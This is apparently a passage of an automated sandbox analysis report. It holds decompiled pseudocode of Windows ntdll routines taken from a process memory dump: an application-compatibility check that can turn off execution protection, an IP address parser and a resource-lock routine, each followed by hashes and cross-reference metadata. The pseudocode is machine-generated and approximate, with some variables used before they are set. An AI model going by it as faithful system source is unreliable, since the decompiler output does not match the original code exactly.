					_t46 =  *0x9a4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00913F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E008D0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00913F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E008D8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00913F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0093E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00913F92();
					_t38 = 1;
					L2:
					return E008CE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                                                                                                                        0x008f7f08
                                                                                                                                                        0x008f7f0f
                                                                                                                                                        0x008f7f12
                                                                                                                                                        0x008f7f1b
                                                                                                                                                        0x008f7f31
                                                                                                                                                        0x00913ead
                                                                                                                                                        0x00913eb4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00913eba
                                                                                                                                                        0x00913ecd
                                                                                                                                                        0x00913ed2
                                                                                                                                                        0x00913ee1
                                                                                                                                                        0x00913ee7
                                                                                                                                                        0x00913eec
                                                                                                                                                        0x00913f12
                                                                                                                                                        0x00913f18
                                                                                                                                                        0x00913f1a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00913f20
                                                                                                                                                        0x00913f26
                                                                                                                                                        0x00913f28
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00913f2e
                                                                                                                                                        0x00913f30
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00913f3a
                                                                                                                                                        0x00913f3b
                                                                                                                                                        0x00913f53
                                                                                                                                                        0x00913f64
                                                                                                                                                        0x00913f69
                                                                                                                                                        0x00913f6c
                                                                                                                                                        0x00913f6d
                                                                                                                                                        0x00913f6f
                                                                                                                                                        0x0091e304
                                                                                                                                                        0x0091e30f
                                                                                                                                                        0x0091e315
                                                                                                                                                        0x0091e31e
                                                                                                                                                        0x0091e321
                                                                                                                                                        0x0091e327
                                                                                                                                                        0x0091e329
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0091e32f
                                                                                                                                                        0x0091e32f
                                                                                                                                                        0x0091e337
                                                                                                                                                        0x0091e33a
                                                                                                                                                        0x0091e33b
                                                                                                                                                        0x0091e33d
                                                                                                                                                        0x0091e33f
                                                                                                                                                        0x0091e341
                                                                                                                                                        0x0091e341
                                                                                                                                                        0x0091e34e
                                                                                                                                                        0x0091e353
                                                                                                                                                        0x0091e358
                                                                                                                                                        0x0091e35d
                                                                                                                                                        0x0091e35f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0091e365
                                                                                                                                                        0x0091e365
                                                                                                                                                        0x0091e368
                                                                                                                                                        0x0091e36e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0091e374
                                                                                                                                                        0x0091e32f
                                                                                                                                                        0x00913f75
                                                                                                                                                        0x00913f7a
                                                                                                                                                        0x00913f7c
                                                                                                                                                        0x00913f7e
                                                                                                                                                        0x00913f86
                                                                                                                                                        0x008f7f39
                                                                                                                                                        0x008f7f47
                                                                                                                                                        0x008f7f47
                                                                                                                                                        0x008f7f37
                                                                                                                                                        0x008f7f37
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00913F12
                                                                                                                                                        Strings
                                                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0091E2FB
                                                                                                                                                        • ExecuteOptions, xrefs: 00913F04
                                                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00913F75
                                                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00913EC4
                                                                                                                                                        • Execute=1, xrefs: 00913F5E
                                                                                                                                                        • X'L, xrefs: 008F7F1E
                                                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00913F4A
                                                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 0091E345
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BaseDataModuleQuery
                                                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$X'L
                                                                                                                                                        • API String ID: 3901378454-2021664842
                                                                                                                                                        • Opcode ID: 587eb052462a409617d44b0b7c4cea4380ff929dee154fb6fa9d0afda70bf443
                                                                                                                                                        • Instruction ID: d6785467c0747741815115a6e70cceee07e207a6ec2b549953a9dbe8ff2c79af
                                                                                                                                                        • Opcode Fuzzy Hash: 587eb052462a409617d44b0b7c4cea4380ff929dee154fb6fa9d0afda70bf443
                                                                                                                                                        • Instruction Fuzzy Hash: F2419971A4031C7AEF209AA4DCC6FEA73BCFF58700F0005A9B615E61C1EA70DA858B61
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00900B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E00900B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E008D8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E008CDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00900CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00900CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E009006BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E009006BA(_t135, _t178) == 0 || E00900A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00900CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00900CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E009006BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E009006BA(_t124, _t142) == 0 || E00900A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                                                                                                                        0x00900b21
                                                                                                                                                        0x00900b24
                                                                                                                                                        0x00900b27
                                                                                                                                                        0x00900b2a
                                                                                                                                                        0x00900b2d
                                                                                                                                                        0x00900b30
                                                                                                                                                        0x00900b33
                                                                                                                                                        0x00900b36
                                                                                                                                                        0x00900b39
                                                                                                                                                        0x00900b3e
                                                                                                                                                        0x00900c65
                                                                                                                                                        0x00900c68
                                                                                                                                                        0x00900c6a
                                                                                                                                                        0x00900c6f
                                                                                                                                                        0x0092eb42
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092eb48
                                                                                                                                                        0x0092eb48
                                                                                                                                                        0x00900c75
                                                                                                                                                        0x00900c7a
                                                                                                                                                        0x0092eb54
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092eb5a
                                                                                                                                                        0x00900c80
                                                                                                                                                        0x00900c84
                                                                                                                                                        0x0092eb98
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092eba6
                                                                                                                                                        0x00900cb8
                                                                                                                                                        0x00900cba
                                                                                                                                                        0x00900cd3
                                                                                                                                                        0x00900cda
                                                                                                                                                        0x00900ce4
                                                                                                                                                        0x00900ce9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00900cec
                                                                                                                                                        0x00900c8c
                                                                                                                                                        0x0092eb63
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092eb70
                                                                                                                                                        0x0092eb75
                                                                                                                                                        0x0092eb7d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092eb8c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092eb8c
                                                                                                                                                        0x00900c96
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00900ca2
                                                                                                                                                        0x00900cac
                                                                                                                                                        0x00900cb4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00900b44
                                                                                                                                                        0x00900b47
                                                                                                                                                        0x00900b49
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00900b4f
                                                                                                                                                        0x00900b50
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00900b56
                                                                                                                                                        0x00900b62
                                                                                                                                                        0x00900b7c
                                                                                                                                                        0x00900bac
                                                                                                                                                        0x00900a0f
                                                                                                                                                        0x0092eaaa
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092eac4
                                                                                                                                                        0x0092eac4
                                                                                                                                                        0x00900bd0
                                                                                                                                                        0x00900bd0
                                                                                                                                                        0x00900bd4
                                                                                                                                                        0x00900bd9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00900bdb
                                                                                                                                                        0x00900be0
                                                                                                                                                        0x0092eb0e
                                                                                                                                                        0x00900a1a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00900a1a
                                                                                                                                                        0x0092eb1a
                                                                                                                                                        0x0092eb1f
                                                                                                                                                        0x0092eb27
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092eb36
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092eb36
                                                                                                                                                        0x00900bea
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00900bf6
                                                                                                                                                        0x00900c00
                                                                                                                                                        0x00900c03
                                                                                                                                                        0x00900c0b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00900c0b
                                                                                                                                                        0x0092eaaa
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00900a15
                                                                                                                                                        0x00900bb6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00900bc6
                                                                                                                                                        0x00900bc6
                                                                                                                                                        0x00900bcb
                                                                                                                                                        0x00900c15
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00900c1d
                                                                                                                                                        0x00900c20
                                                                                                                                                        0x00900c21
                                                                                                                                                        0x00900c24
                                                                                                                                                        0x00900c24
                                                                                                                                                        0x00900c26
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00900c26
                                                                                                                                                        0x00900bcd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00900bcd
                                                                                                                                                        0x00900b89
                                                                                                                                                        0x00900b89
                                                                                                                                                        0x00900b90
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00900b96
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00900b96
                                                                                                                                                        0x00900a04
                                                                                                                                                        0x00900a04
                                                                                                                                                        0x00900b9a
                                                                                                                                                        0x00900b9a
                                                                                                                                                        0x00900b9b
                                                                                                                                                        0x00900b9f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00900ba5
                                                                                                                                                        0x00900ac7
                                                                                                                                                        0x00900aca
                                                                                                                                                        0x0092eacf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092eade
                                                                                                                                                        0x0092eade
                                                                                                                                                        0x0092eae3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092eaf3
                                                                                                                                                        0x0092eaf6
                                                                                                                                                        0x0092eaf7
                                                                                                                                                        0x0092eafe
                                                                                                                                                        0x0092eb01
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092eb01
                                                                                                                                                        0x0092eacf
                                                                                                                                                        0x00900ad0
                                                                                                                                                        0x00900ad4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00900ada
                                                                                                                                                        0x00900ae6
                                                                                                                                                        0x00900c34
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00900c47
                                                                                                                                                        0x00900c49
                                                                                                                                                        0x00900c4a
                                                                                                                                                        0x00900c4e
                                                                                                                                                        0x00900c51
                                                                                                                                                        0x00900c54
                                                                                                                                                        0x00900c57
                                                                                                                                                        0x00900c5a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00900c60
                                                                                                                                                        0x00900afb
                                                                                                                                                        0x00900afe
                                                                                                                                                        0x00900b02
                                                                                                                                                        0x00900b05
                                                                                                                                                        0x00900b08
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00900b08
                                                                                                                                                        0x00900ae6
                                                                                                                                                        0x00900b44
                                                                                                                                                        0x009009f8
                                                                                                                                                        0x009009f8
                                                                                                                                                        0x009009f9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092eaa0
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __fassign
                                                                                                                                                        • String ID: .$:$:
                                                                                                                                                        • API String ID: 3965848254-2308638275
                                                                                                                                                        • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                        • Instruction ID: 759d062b201271faa9d41a037277465b0e31306e5b9c2d292e436fb1f884d6e6
                                                                                                                                                        • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                        • Instruction Fuzzy Hash: 2EA19D71D0031AEFEF24CF64C8457BEB7B9AF95704F24856AD882A72C1D7349A41CB52
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00900554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                        			E00900554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009a01c0;
									_push(_t144);
									_push(0);
									_t51 = E008BF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00904FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00913F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00913F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0094217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00913F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00903915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009a01c0;
												_push(_t138);
												_push(0);
												_t58 = E008BF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00904FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00913F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00913F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0094217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00913F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00903915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E008E5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E008BF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00903915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E008BF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00903915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E008BF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00903915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E008E5329(_t110, _t138);
																_t69 = E008E53A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































